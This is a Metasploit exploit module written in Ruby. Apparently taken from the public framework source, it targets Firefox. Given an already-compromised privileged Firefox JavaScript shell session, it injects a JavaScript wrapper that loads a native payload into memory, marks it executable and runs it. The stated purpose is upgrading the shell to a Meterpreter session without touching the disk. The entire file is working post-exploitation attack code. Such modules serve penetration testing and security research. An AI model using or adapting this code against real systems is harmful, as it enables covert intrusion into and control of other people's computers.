## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/payload/firefox' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking # Missing autodetection, but has widespread targetability include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, 'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell', 'Description' => %q{ This module allows execution of native payloads from a privileged Firefox Javascript shell. It places the specified payload into memory, adds the necessary protection flags, and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter session without touching the disk. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' ], 'Platform' => [ 'firefox' ], 'DisclosureDate' => 'Mar 10 2014', 'Targets' => [ [ 'Native Payload', { 'Platform' => %w{ linux osx win unix }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0 )) register_options([ OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90]) ]) end def exploit print_status "Running the Javascript shell..." session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) print_warning(results) if results.present? end def js_payload %Q| (function(send){ try { #{run_payload} send("Payload executed."); } catch (e) { send(e); } })(send); |.strip end end